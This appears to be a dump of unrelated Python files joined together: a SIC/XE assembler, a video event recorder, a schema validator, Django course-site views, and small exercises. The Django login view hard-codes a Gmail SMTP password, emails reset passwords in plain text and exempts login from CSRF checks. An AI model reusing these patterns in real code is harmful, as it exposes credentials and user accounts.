        line = line.lstrip()
        line = line[len(curr_mnemonic)+1:]
        if curr_mnemonic[0] == '+':
            ext = True
            curr_mnemonic = curr_mnemonic[1:]
            # BUG FIX: an unknown '+mnemonic' used to raise KeyError here
            # instead of printing the diagnostic; guard the table lookup.
            if curr_mnemonic not in opcode_table or opcode_table[curr_mnemonic][0] != 'm':
                print('Unrecognized instruction or directive: Line ' + str(linectr))
                sys.exit(1)
    else:
        print('Invalid instruction in line ' + str(linectr))
        sys.exit(1)
    curr_mnemonic = curr_mnemonic.rstrip()
    mnemonic = curr_mnemonic
    #check if its a directive
    if curr_mnemonic in directives:
        if curr_mnemonic == 'byte':
            byteRe = re.compile(r'\s*(?P<byte>c*x*\'*-*.+\'*)\s*', re.IGNORECASE)
            bytesearch = byteRe.search(line)
            if bytesearch:
                line = line.lstrip()
                line = line[len(bytesearch.group('byte')):]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                num_bytes = bytesearch.group('byte')
                num_bytes = num_bytes.rstrip()
                operand1 = num_bytes
                if num_bytes[:2].lower() == 'c\'':
                    # character constant: one byte per character
                    if num_bytes.count('\'') < 2:
                        print('Illegal declaration of bytes in line ' + str(linectr))
                        print(orig)
                        sys.exit(1)
                    if num_bytes[-1] != '\'':
                        while num_bytes[-1] != '\'':
                            num_bytes = num_bytes[:-1]
                    ctr += len(num_bytes[2:-1])
                elif num_bytes[:2].lower() == 'x\'':
                    # hex constant: two hex digits per byte (rounded up)
                    if num_bytes.count('\'') != 2:
                        print('Illegal declaration of bytes in line ' + str(linectr))
                        print(orig)
                        sys.exit(1)
                    if num_bytes[-1] != '\'':
                        while num_bytes[-1] != '\'':
                            num_bytes = num_bytes[:-1]
                    for char in num_bytes[2:-1]:
                        if char.lower() not in '0123456789abcdef':
                            print('Illegal declaration of bytes in line ' + str(linectr))
                            print(orig)
                            sys.exit(1)
                    # NOTE(review): relies on a module-level `import math` above
                    # this chunk — confirm it exists.
                    ctr += math.ceil((len(num_bytes[2:-1])) / 2)
                else:
                    # plain decimal constant, one byte
                    sign = ''
                    if operand1[0] == '-' or operand1[0] == '+':
                        sign = operand1[0]
                        operand1 = operand1[1:]
                    if not operand1.isnumeric():
                        print('Illegal declaration of constant in line ' + str(linectr))
                        sys.exit(1)
                    operand1 = sign + operand1
                    if int(operand1) < -128 or int(operand1) > 255:
                        print('Byte size too large: Line ' + str(linectr))
                        sys.exit(1)
                    ctr += 1
            else:
                print('Please declare a byte in line ' + str(linectr))
                sys.exit(1)
        elif curr_mnemonic == 'word':
            temp_line = line.lstrip()
            c = 0
            if temp_line[0] == '-' or temp_line[0] == '+':
                c = 1
            while temp_line[c] in '0123456789':
                c += 1
            if not temp_line[c:].isspace() and temp_line[c:] != '':
                print('Extraneous characters in line ' + str(linectr))
                print(orig)
                sys.exit(1)
            num = int(temp_line[:c])
            operand1 = num
            if num >= pow(16, 6) or num < (-(pow(16, 6)) / 2):
                print('Memory error: Line '+ str(linectr) + ', Size of bytes being reserved too large')
                sys.exit(1)
            ctr += 3
        elif curr_mnemonic == 'resb':
            temp_line = line.lstrip()
            c = 0
            while temp_line[c] in '0123456789':
                c += 1
            if not temp_line[c:].isspace() and temp_line[c:] != '':
                print('Extraneous characters in line ' + str(linectr))
                print(orig)
                sys.exit(1)
            num = int(temp_line[:c])
            operand1 = num
            ctr += num
        elif curr_mnemonic == 'base':
            # activate base-relative addressing for following lines
            based_holder[0] = True
            basedopsearch = re.compile(r'\s*(?P<based>@*#*\s*[a-z0-9_]+)\s*', re.IGNORECASE)
            basedsearch = basedopsearch.search(line)
            if basedsearch:
                line = line.lstrip()
                line = line[len(basedsearch.group('based')):]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                based_sym = basedsearch.group('based').rstrip()
                if based_sym[0] == '_':
                    print('Illegal base directive: Line ' + str(linectr))
                    sys.exit(1)
                if based_sym[0].isnumeric():
                    if not based_sym[1:].isnumeric():
                        print('Extraneous characters in line ' + str(linectr))
                        sys.exit(1)
                if based_sym in registers:
                    print('Register used where label expected: Line ' + str(linectr))
                    sys.exit(1)
                operand1 = based_sym
                based_holder.append(based_sym)
            else:
                print('Provide a symbol for the base directive in line ' + str(linectr))
                sys.exit(1)
        elif curr_mnemonic == 'nobase':
            based_holder[0] = False
        elif curr_mnemonic == 'resw':
            temp_line = line.lstrip()
            c = 0
            while temp_line[c] in '0123456789':
                c += 1
            num = int(temp_line[:c])
            operand1 = num
            ctr += (num * 3)
        elif curr_mnemonic == 'start':
            # start must precede any code-bearing line
            if linectr > 0:
                for l in line_lst:
                    if l.mnemonic or l.label:
                        print('Start encountered after first line')
                        sys.exit(1)
            startRe = re.compile(r'\s*(?P<start>[a-f0-9]+)\s*', re.IGNORECASE)
            startSearch = startRe.search(line)
            if startSearch:
                line = line.lstrip()
                line = line[len(startSearch.group('start')):]
                if not line.isspace():
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                ctr = int(startSearch.group('start').rstrip(), 16)
                if ctr > int('fffff', 16):
                    print('Start address too large')
                    sys.exit(1)
                # the program-name label now refers to the start address
                if label_search:
                    sym_tab[label_search.group('label').lower()] = ctr
        elif curr_mnemonic == 'end':
            endsearchre = re.compile(r'\s*(?P<end>[a-z0-9]*)\s*', re.IGNORECASE)
            endsearch = endsearchre.search(line)
            if endsearch:
                line = line.lstrip()
                line = line[len(endsearch.group('end')):]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                operand1 = endsearch.group('end').rstrip()
                if operand1.isalpha() and operand1.lower() not in sym_tab:
                    print('Undefined symbol defined as entry point in end instruction: ' + operand1)
                    sys.exit(1)
            line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
                operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
            linectr += 1
            return (ctr, True, linectr)
    elif curr_mnemonic in opcode_table:
        mnemonic_lst = opcode_table[curr_mnemonic]
        optype = mnemonic_lst[0]
        # '+' on a format-3 instruction promotes it to format 4
        if mnemonic_lst[2] == '3' and ext:
            ctr += 4
            format_instr = 4
        else:
            ctr += int(mnemonic_lst[2])
            format_instr = int(mnemonic_lst[2])
        if mnemonic_lst[0] == 'm':
            # memory operand, optionally '@'/'#'-prefixed and/or ',x'-suffixed
            operandLabelRe = re.compile(r'\s*(?P<oplabelre>@*#*\s*[a-z0-9_]+\s*,*\s*x*)\s*', re.IGNORECASE)
            oplabelsearch = operandLabelRe.search(line)
            if oplabelsearch:
                operand1 = oplabelsearch.group('oplabelre').lower().replace(' ', '')
                line = line.lstrip()
                if operand1.rstrip().isnumeric():
                    if not line[0].isnumeric():
                        print('Illegal instruction format: Line ' + str(linectr))
                        sys.exit(1)
                line = line[len(oplabelsearch.group('oplabelre')):]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                operand1 = operand1.rstrip()
                if ',x' in operand1:
                    indexed = True
                    operand1 = operand1[:-2]
                if '@' in operand1:
                    indirect = True
                    operand1 = operand1[1:]
                if '#' in operand1:
                    imm = True
                    operand1 = operand1[1:]
                if '\n' in operand1:
                    operand1 = operand1.replace('\n', '')
                if (imm and indexed) or (indirect and indexed) or (imm and indirect):
                    print('Can not combine adrressing modes: Line ' + str(linectr))
                    sys.exit(1)
                if operand1[0].isnumeric():
                    for char in operand1[1:]:
                        if char.lower() in 'abcdefghijklmnopqrstuvwxyz':
                            print('Extraneous characters in line ' + str(linectr))
                            print(orig)
                            sys.exit(1)
                if operand1 in registers:
                    print('Register used where symbol expected: Line ' + str(linectr))
                    sys.exit(1)
                # forward reference: remember it until the label is defined
                if operand1 not in sym_tab and operand1 not in symbols_undef and not operand1.isnumeric():
                    symbols_undef.append(operand1)
            else:
                #raise an error
                print('Error: Must provide a memory symbol, Line ' + str(linectr))
                sys.exit(1)
        elif mnemonic_lst[0] == 'r' and mnemonic_lst[1] == 2:
            # two register operands "r1,r2"
            operandRegRe = re.compile(r'\s*(?P<opRegre>(a|b|x|l|pc|sw|b|s|t|f)\s*,\s*(a|b|x|l|pc|sw|b|s|t|f))\s*', re.IGNORECASE)
            opregsearch = operandRegRe.search(line)
            if opregsearch:
                line = line.lstrip()
                line = line[len(opregsearch.group('opRegre'))+1:]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                operand = opregsearch.group('opRegre').replace(' ', '')
                operand1, operand2 = operand.split(',')
                operand1, operand2 = operand1.rstrip(), operand2.rstrip()
            else:
                print('Error: Must provide a valid register, Line ' + str(linectr))
                sys.exit(1)
        elif mnemonic_lst[0] == 'r1' and mnemonic_lst[1] == 1:
            # single register operand
            operandSingleRegRe = re.compile(r'\s*(?P<opsingleRe>(a|b|x|l|pc|sw|b|s|t|f))\s*', re.IGNORECASE)
            opsinglesearch = operandSingleRegRe.search(line)
            if opsinglesearch:
                line = line.lstrip()
                line = line[len(opsinglesearch.group('opsingleRe'))+1:]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                operand1 = opsinglesearch.group('opsingleRe').rstrip()
            else:
                print('Error: Must provide a valid register, Line ' + str(linectr))
                sys.exit(1)
        elif mnemonic_lst[0] == 'r/n':
            # register plus shift count "r,n"
            operandRegNRe = re.compile(r'\s*(?P<opRegNre>(a|b|x|l|pc|sw|b|s|t|f)\s*,\s*[0-9]+)\s*', re.IGNORECASE)
            opregNsearch = operandRegNRe.search(line)
            if opregNsearch:
                line = line.lstrip()
                line = line[len(opregNsearch.group('opRegNre'))+1:]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                operand = opregNsearch.group('opRegNre').replace(' ', '')
                operand1, operand2 = operand.split(',')
                operand1, operand2 = operand1.rstrip(), operand2.rstrip()
                # shift counts are 1..16 (encoded as count-1); others 0..15
                if curr_mnemonic == 'shiftl' or curr_mnemonic == 'shiftr':
                    if int(operand2) > 16 or int(operand2) < 1:
                        print('Error: Illegal constant bigger than 16 in line ' + str(linectr))
                        sys.exit(1)
                elif int(operand2) > 15 or int(operand2) < 0:
                    print('Error: Illegal constant bigger than 16 in line ' + str(linectr))
                    sys.exit(1)
            else:
                print('Error: Must provide a valid register and positive number less than 16, Line ' + str(linectr))
                sys.exit(1)
        elif mnemonic_lst[0] == 'n':
            # single numeric operand 0..15 (e.g. svc)
            operandNRe = re.compile(r'\s*(?P<opNre>[0-9]+)\s*', re.IGNORECASE)
            opNsearch = operandNRe.search(line)
            if opNsearch:
                line = line.lstrip()
                if not line[0].isnumeric():
                    print('Illegal instruction format: Line ' + str(linectr))
                    sys.exit(1)
                line = line[len(opNsearch.group('opNre'))+1:]
                if not line.isspace() and line != '':
                    print('Extraneous characters in line ' + str(linectr))
                    print(orig)
                    sys.exit(1)
                operand1 = opNsearch.group('opNre').replace(' ', '').rstrip()
                if int(operand1) > 15 or int(operand1) < 0:
                    print('Error: Illegal constant bigger than 16 in line ' + str(linectr))
                    sys.exit(1)
            else:
                print('Error: Must provide a positive number less than 16, Line ' + str(linectr))
                sys.exit(1)
        elif mnemonic_lst[0] is None:
            # no-operand instruction: anything remaining is an error
            line = line.lstrip()
            if not line.isspace() and line != '':
                print('Extraneous characters in line ' + str(linectr) + ':')
                print(orig)
                sys.exit(1)
    else:
        print(orig)
        print('Invalid instruction in line ' + str(linectr))
        sys.exit(1)
    # everything else at this point should be a comment
    # fix to check for column 40
    line = line.lstrip()
    comment_ = line
    #create a line object and append to line lst
    line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
        operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
    linectr += 1
    return (ctr, False, linectr)
def untabify(string):
    ''' Expand each tab in `string` to spaces, advancing to the next
    column that is a multiple of 8 (a tab already on a tab stop still
    advances a full 8 columns). Columns are counted from the start of
    the string; embedded newlines do not reset the count. '''
    expanded = ''
    for ch in string:
        if ch == '\t':
            # distance to the next multiple-of-8 column; a full stop (8)
            # when we are already exactly on one
            pad = 8 - (len(expanded) % 8)
            expanded += ' ' * pad
        else:
            expanded += ch
    return expanded
def main():
    ''' Entry point: run the two-pass SIC/XE assembler.

    Pass 1 (parse_asm) builds sym_tab and line_lst; pass 2 calls
    Line.assemble() on every parsed line and prints the object code.
    Exits with status 1 on any usage or input error.
    '''
    # ######################################## #
    # Pass 1
    if len(sys.argv) != 3:
        print('Command line arguments insufficient')
        sys.exit(1)
    # BUG FIX: the original called os.stat() on the path BEFORE the
    # FileNotFoundError handler around open(), so a missing file crashed
    # with a traceback instead of the friendly message. Open first, then
    # stat; the `with` block also guarantees the file is closed.
    try:
        src = open(sys.argv[1], encoding='utf-8')
    except FileNotFoundError:
        print('Please provide a file that exists')
        sys.exit(1)
    with src:
        if os.stat(sys.argv[1]).st_size == 0:
            print('0: No code or data in assembly file:')
            sys.exit(1)
        locctr, linectr, endf = 0, 0, False
        for line in src:
            locctr, endf, linectr = parse_asm(line, locctr, linectr)
            if endf:
                break
    if not endf:
        print('Program did not contain an end directive')
        sys.exit(1)
    # reject programs consisting solely of directives
    no_code = True
    for line in line_lst:
        if line.mnemonic != 'start' and line.mnemonic != 'end' and line.mnemonic != 'base' and line.mnemonic != 'nobase':
            no_code = False
            break
    if no_code:
        print('No code or data in assembly file')
        sys.exit(1)
    # ######################################### #
    # Pass 2
    for line in line_lst:
        all_objCode.append(line.assemble())
        print(all_objCode[-1])
if __name__ == "__main__":
    main()
|
'''The MIT License (MIT)
Copyright (c) 2021, Demetrius Almada
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
from collections import deque
from queue import Queue
from threading import Thread
import numpy as np
import cv2
import time
class EventRecorder:
    """Keeps a rolling buffer of recent frames and, once triggered,
    streams them (plus all subsequent frames) to a video file on a
    background thread. Can also save throttled screenshots.
    """
    def __init__(self, buffer_size=64, timeout=1.0):
        # buffer_size: number of pre-event frames retained
        # timeout: seconds the writer thread sleeps when the queue is empty
        self.buffer_size = buffer_size
        self.timeout = timeout
        # newest frame at index 0 (appendleft in update())
        self.frame_buffer = deque(maxlen=buffer_size)
        self.frame_queue = None
        self.is_recording = None
        self.thread = None
        self.writer = None
        self.frames_without_motion = 0
        self.consecutive_frames = 0
        # np.inf so the very first take_screenshot() call always fires
        self.frames_since_screenshot = np.inf
    def start(self, output_path, video_codec, fps):
        """Begin recording: flush the buffered frames to the queue and
        start the background writer thread. Requires at least one frame
        already in the buffer (its shape sizes the video)."""
        self.is_recording = True
        self.frame_queue = Queue()
        (height, width, _) = self.frame_buffer[0].shape
        # BUG FIX: cv2.VideoWriter expects frameSize as (width, height);
        # the original passed (height, width), producing broken output for
        # any non-square frame.
        self.writer = cv2.VideoWriter(
            output_path,
            video_codec,
            fps,
            (width, height)
        )
        # enqueue buffered frames oldest-first (buffer holds newest-first)
        for i in range(len(self.frame_buffer), 0, -1):
            self.frame_queue.put(self.frame_buffer[i - 1])
        self.thread = Thread(target=self.record_video, args=())
        self.thread.daemon = True
        self.thread.start()
    def update(self, frame):
        """Push a new frame into the rolling buffer and, while recording,
        onto the writer queue."""
        self.frame_buffer.appendleft(frame)
        if self.is_recording:
            self.frame_queue.put(frame)
            self.consecutive_frames += 1
    def record_video(self):
        """Writer-thread loop: drain the queue into the video file until
        stop() clears is_recording."""
        while True:
            if not self.is_recording:
                return
            if not self.frame_queue.empty():
                frame = self.frame_queue.get()
                self.writer.write(frame)
            else:
                time.sleep(self.timeout)
    def take_screenshot(self, image, screenshot_path, delay=30):
        """Write `image` to disk, but at most once every `delay` calls."""
        if self.frames_since_screenshot >= delay:
            cv2.imwrite(screenshot_path, image)
            self.frames_since_screenshot = 0
        self.frames_since_screenshot += 1
    def stop(self):
        """Stop recording: join the writer thread, flush any queued
        frames, and release the video file."""
        self.is_recording = False
        self.consecutive_frames = 0
        self.thread.join()
        while not self.frame_queue.empty():
            frame = self.frame_queue.get()
            self.writer.write(frame)
        self.writer.release()
|
from Data_Validator.schema_reader import load_schema
from Log_Writer.logger import App_Logger
import numpy as np
def verify_with_schema(data, schema_path):
    """Validate a DataFrame against the schema at `schema_path`.

    Checks, in order: column count, column names, per-column dtypes.
    Returns the error count (0 when everything validates; the function
    short-circuits and returns 1 on the first failing check). Returns
    None if an unexpected exception occurs.
    """
    log_writer = App_Logger()
    try:
        col_length, col_names, dtypes = load_schema(schema_path)
        err = 0
        # validate column count
        if data.shape[1] == col_length:
            log_writer.log("Column Length Validated")
        else:
            # BUG FIX: the old message hard-coded "20"; report the actual
            # expected/observed counts instead.
            log_writer.log(f"\nColumn count {data.shape[1]} does not match the schema's {col_length}\n")
            err += 1
            return err
        # validate column names (order-insensitive)
        if set(data.columns) == set(col_names):
            log_writer.log("Column Names Validated")
        else:
            log_writer.log("\nColumn names are not as required by the format\n")
            err += 1
            return err
        # validate data types; stop at the first mismatching column
        for col, dtype in zip(data.columns, dtypes):
            if data[col].dtypes != np.dtype(dtype):
                log_writer.log(f"\nThe data type of values in column {col} is not same as {dtype}\n")
                log_writer.log("\nERROR in the data type of input data\n")
                err += 1
                return err
        # BUG FIX: the original fell off the end and returned None on
        # success; return the (zero) error count explicitly.
        return err
    except Exception as e:
        log_writer.log("\nERROR occured in data validation\n")
        # preserves the original contract: prints the exception, returns None
        return print(e)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.shortcuts import *
from django.contrib import auth
from django.http import *
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.db import connection
from django.db.models import Count
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from htmlapp.forms import loginform
from htmlapp.models import *
from django.views.decorators.csrf import csrf_exempt
import smtplib
import random
def csrf_failure(request, reason=""):
    """Custom CSRF-failure handler: render the generic 404 page with a
    'do not tamper' message. `mng` reaches the template via locals()."""
    mng="請勿不當操作。"
    # NOTE(review): render_to_response is removed in modern Django — confirm
    # the installed Django version still provides it.
    return render_to_response('404.html',locals())
def null_course(request):
    """Shown when the user opens a course they never enrolled in.
    `mng` ("this course was never selected") reaches the template via locals()."""
    mng="這是沒有選取過的課程!"
    return render(request,'nullcourse.html',locals())
def index(request):
    """Render the site landing page."""
    return render(request, 'index.html',locals())
def dess(request):
    """Render the standalone test page (no context)."""
    return render(request,'test.html')
@csrf_exempt
def login(request):
    """Login view plus "forgot password" flow.

    POST: authenticate with email/password; staff users are logged in and
    redirected to /setting/.
    GET with an `email` parameter: if the address belongs to exactly one
    user, generate a random 8-character password, save it, and email it to
    the user.
    Template context is passed via locals(), so local names here are part
    of the template contract.
    """
    if request.method == 'POST':
        form = loginform(request.POST)
        mng=""
        email = request.POST['email']
        passd = request.POST['passd']
        user = auth.authenticate(username=email , password=passd)
        if user is not None and user.is_staff:
            auth.login(request, user)
            mng="登入成功"
            # NOTE(review): locals() is passed as HttpResponseRedirect's second
            # positional argument (response content), not as template context —
            # confirm this is intentional.
            return HttpResponseRedirect('/setting/',locals())
        else:
            mng="帳號或密碼錯誤"
            return render(request,'login.html',locals())
    else:
        form = loginform()
    if request.method == 'GET':
        unpassword='unpassword'
        user_email=User.objects.all()
        user_email=[user_email[x].email for x in range(len(user_email))]
        email=request.GET.get('email')
        confirm=0
        bool_email=bool(email)
        if bool_email == True:
            # count how many accounts carry this email address
            for x in range(len(user_email)):
                if user_email[x] != email:
                    confirm=confirm+0
                else:
                    confirm=confirm+1
            if confirm == 1:
                # build an 8-char password alternating lowercase/uppercase
                rand1 = [chr(random.randint(97, 122)) for x in range(4) ]
                rand2 = [chr(random.randint(65, 90)) for x in range(4)]
                rand=""
                for x in range(len(rand1)):
                    rand=rand+rand1[x]+rand2[x]
                user_password=User.objects.get(email=email)
                user_password.set_password(rand)
                user_password.save()
                into='請記住新的密碼:'+rand+'\n若要修改請至 https://projecthtml-theleaves.c9users.io/ 登入後修改'
                # SECURITY(review): SMTP credentials are hard-coded in source and
                # the new password is emailed in plain text; `random` is not a
                # cryptographically secure generator. Move credentials to
                # settings/env and switch to a token-based reset flow.
                gmail_user = 'pythonbeginnercourse@gmail.com'
                gmail_pwd = '3ajilojl'
                smtpserver = smtplib.SMTP("smtp.gmail.com",587)
                smtpserver.ehlo()
                smtpserver.starttls()
                smtpserver.ehlo()
                smtpserver.login(gmail_user, gmail_pwd)
                fromaddr = "pythonbeginnercourse@gmail.com"
                toaddrs = [email]
                msg = ("From: %s\r\nTo: %s\r\nSubject: %s\r\n" % (fromaddr, ", ".join(toaddrs), 'Python教學網站'))
                smtpserver.sendmail(fromaddr, toaddrs,msg.encode('utf-8')+into.encode('utf-8'))
                smtpserver.quit()
    return render(request,'login.html',locals())
def logout(request):
    """Log the current user out and send them back to the index page.
    NOTE: this view shadows the django.contrib.auth.logout imported above;
    the call below goes through the `auth` module object, so it still works."""
    auth.logout(request)
    return HttpResponseRedirect('/index/')
def change_password(request):
    """Change the logged-in user's password when the two submitted fields
    match. On mismatch (or GET) the form is simply re-rendered with no
    error message — NOTE(review): consider surfacing a mismatch warning."""
    if request.method == "POST":
        password=User.objects.get(id=request.user.id)
        change_password=request.POST['passd']
        confirm_password=request.POST['passd2']
        if change_password == confirm_password :
            password.set_password(change_password)
            password.save()
    return render(request,'change_password.html',locals())
def register(request):
    """Account registration.

    GET with a `confirm` parameter performs the actual signup: the account
    name and email must both be unused and the two password fields must
    match and be non-empty. `bool_register` tells the template whether the
    account was created (context passed via locals()).
    """
    user_email=User.objects.all()
    if (request.method == 'GET') and ('confirm' in request.GET):
        acc_confirm = 0
        email_confirm = 0
        utest=User.objects.all()
        user_acc=[utest[x].username for x in range(len(utest))]
        confirm='confirm'
        user_email=[user_email[x].email for x in range(len(user_email))]
        email=request.GET.get('email')
        acc=request.GET.get('acceunt')
        # count existing accounts with the same username
        for x in range(len(user_acc)):
            if user_acc[x] == acc:
                acc_confirm=acc_confirm+1
        # count existing accounts with the same email
        for x in range(len(user_email)):
            if user_email[x] == email:
                email_confirm=email_confirm+1
        if acc_confirm ==0 and email_confirm ==0:
            password=request.GET.get('passd')
            password2=request.GET.get('passd2')
            if password == password2 and password != '' and password2 != '':
                bool_register=True
                # create() stores the raw value; set_password() below replaces
                # it with a proper hash before save()
                user_add=User.objects.create(username=acc,email=email,password=password,is_staff=True)
                user_add.set_password(password)
                user_add.save()
            else:
                bool_register=False
    return render(request, 'register.html',locals())
@login_required
def setting(request):
    """Settings page: list the user's enrolled courses and handle
    "<lesson>_cancel" GET parameters by removing the user from that
    course's many-to-many user_id relation."""
    row=course4_attribute.objects.filter(user_id=str(request.user.id))
    coursebool=bool(row)
    if coursebool != False:
        test=course4_attribute.objects.filter(user_id=str(request.user.id))
        testa=[x for x in test]
        testc=len(testa)
        if (request.method =="GET") and (testc != 0):
            for x in range(len(testa)):
                if str(testa[x].lesson_name)+"_cancel" in request.GET:
                    b=str(testa[x].lesson_name)
                    testc=testc-1
                    course=course4_attribute.objects.get(lesson_name=b)
                    course.user_id.remove(int(request.user.id)) # M2M: add() enrolls, remove() withdraws
                    b=str(testa[x].lesson_name)+"_cancel"
                    course.save()
    return render(request, 'set.html',locals())
@login_required
def course(request):
    """Course catalog page: a GET parameter named after a lesson enrolls
    the user in it; "<lesson>_cancel" is only echoed back to the template."""
    if request.method =='GET':
        lesson=course4_attribute.objects.all()
        a=[x for x in lesson]
        for x in range(len(a)):
            if str(a[x].lesson_name) in request.GET:
                b=str(a[x].lesson_name)
                course=course4_attribute.objects.get(lesson_name=b)
                course.user_id.add(int(request.user.id)) # M2M: add() enrolls, remove() withdraws
                course.save()
            elif str(a[x].lesson_name)+"_cancel" in request.GET:
                b=str(a[x].lesson_name)+"_cancel"
    return render(request, 'course.html',locals())
@login_required
def user(request):
    """Profile page: per-course progress statistics plus inline editing of
    the user's name, email and self-introduction.

    tt: total exercise count per enrolled course; tc: correctly answered
    count per course; tct: percentage correct per course. The Chinese dict
    keys ("課程" = course, "課程數量" = exercise count, "課程答對數" =
    correct count, "百分比" = percentage) are consumed by the template.
    Context is passed via locals().
    """
    lesson=course4_attribute.objects.filter(user_id=str(request.user.id)).order_by('id')
    a=[lesson[x].id for x in range(len(lesson)) ]
    tcourse= course4_detail.objects.values('course_attribute_id').annotate(dcount=Count('course_attribute_id')).order_by('course_attribute_id')
    cs=course_user.objects.values('lesson_id').annotate(dcount=Count('coursename')).filter(user_id=str(request.user.id),correct=True).order_by('lesson_id')
    tc=[]
    tt=[]
    tct=[]
    # total exercises per enrolled course
    for x in range(len(tcourse)):
        for y in range(len(a)):
            if tcourse[x]['course_attribute_id'] == a[y] :
                tt.append({"課程":lesson[y].lesson,"課程數量":tcourse[x]['dcount']})
    # correct answers per enrolled course
    for x in range(len(cs)):
        for y in range(len(a)):
            if cs[x]['lesson_id'] == a[y] :
                tc.append({"課程":lesson[y].lesson,"課程答對數":cs[x]['dcount']})
    # percentage correct per course
    for x in range(len(tt)):
        for y in range(len(tc)):
            if tt[x]['課程'] == tc[y]['課程']:
                tct.append({"課程":tc[y]['課程'],"百分比":(round(round(tc[y]['課程答對數']/tt[x]['課程數量'],4)*100,2))})
    with connection.cursor() as cursor:
        cursor.execute('SELECT count(coursename) FROM htmlapp_course_user WHERE user_id=%s and correct=%s group by lesson_id',[request.user.id,True])
        row = cursor.fetchone()
    with connection.cursor() as cursor:
        cursor.execute('SELECT * FROM htmlapp_Introduction WHERE user_id=%s ',[request.user.id])
        row2 = cursor.fetchone()
    ## Update personal profile fields ("*btn" toggles edit mode, "*btn2" saves)
    if request.method == 'GET':
        if 'lastbtn' in request.GET:
            lan='lastbtn'
            lastn=request.GET.get("lastname")
            user=User.objects.get(username=request.user.username)
        elif 'lastbtn2' in request.GET:
            lan='lastbtn2'
            lastn=request.GET.get("lastname")
            user=User.objects.get(username=request.user.username)
            user.last_name=lastn
            user.save()
        if 'ebtn' in request.GET:
            lan='ebtn'
            user=User.objects.get(username=request.user.username)
        elif 'ebtn2' in request.GET:
            lan='ebtn2'
            en=request.GET.get("ename")
            user=User.objects.get(username=request.user.username)
            user.email=en
            user.save()
        if 'firstbtn' in request.GET:
            lan='firstbtn'
            user=User.objects.get(username=request.user.username)
        elif 'firstbtn2' in request.GET:
            lan='firstbtn2'
            fristn=request.GET.get("firstname")
            user=User.objects.get(username=request.user.username)
            user.first_name=fristn
            user.save()
        ## Create an empty introduction row on first visit so later visits
        ## can always edit it
        if bool(row2) != True:
            arean=request.GET.get("areaname")
            cour=Introduction(user_id=str(request.user.id),sef="")
            cour.save()
        elif bool(row2) == True :
            fuser=Introduction.objects.get(user_id=request.user.id)
            if 'areabtn' in request.GET:
                lan='areabtn'
                fuser=Introduction.objects.get(user_id=request.user.id)
            elif 'areabtn2' in request.GET:
                lan='areabtn2'
                arean=request.GET.get("areaname")
                fuser=Introduction.objects.get(user_id=request.user.id)
                fuser.sef=arean
                fuser.save()
    return render(request,'./userdata/userdata.html',locals())
def login_error(request):
    """Generic login-error page: render 404.html with a 'do not tamper'
    message (passed to the template via locals())."""
    mng="請勿不當操作。"
    return render(request,'404.html',locals())
|
n=int(input())  # 1-based index of the Fibonacci number to compute
#naive recursive sol
#complexity is O(2^n)
# def fibo(n):
#     if n==1 or n==2:
#         return 1
#     else:
#         return fibo(n-1)+fibo(n-2)
# bottom-up DP version below runs in O(n) time / O(n) space
def fibo(n):
    """Return the n-th Fibonacci number (1-based: fibo(1) == fibo(2) == 1)
    via bottom-up dynamic programming in O(n) time."""
    if n == 1 or n == 2:
        # BUG FIX: the original returned n here, so fibo(2) == 2, which
        # contradicts the DP table below (and the commented naive version)
        # where fib(1) == fib(2) == 1.
        return 1
    dp_arr = [0] * int(n + 1)
    dp_arr[0] = 1  # dp_arr[i] holds fib(i + 1)
    dp_arr[1] = 1
    for i in range(2, n):
        dp_arr[i] = dp_arr[i-1] + dp_arr[i-2]
    return dp_arr[n-1]
print(fibo(n))
|
class Solution:
    def subtractProductAndSum(self, n: int) -> int:
        """Return the product of the decimal digits of n minus their sum."""
        product, total = 1, 0
        for digit in map(int, str(n)):
            product *= digit
            total += digit
        return product - total
|
from rest_api.utils.base_blueprint import BaseBlueprint
from .controllers import CONTROLLERS
from .repositories import REPOSITORIES
from .urls import urls
class TaskBlueprint(BaseBlueprint):
    """Declarative wiring of the /tasks resource: mounts the task
    controllers, repositories and URL map onto the shared BaseBlueprint
    machinery."""
    # URL prefix under which all task routes are registered
    _url_prefix = "/tasks"
    _controllers = CONTROLLERS
    _repositories = REPOSITORIES
    _urls = urls
|
# -*- coding: utf-8 -*-
from flask import current_app
from werkzeug.security import generate_password_hash
from werkzeug.security import check_password_hash
from flask_login import UserMixin
from itsdangerous import (
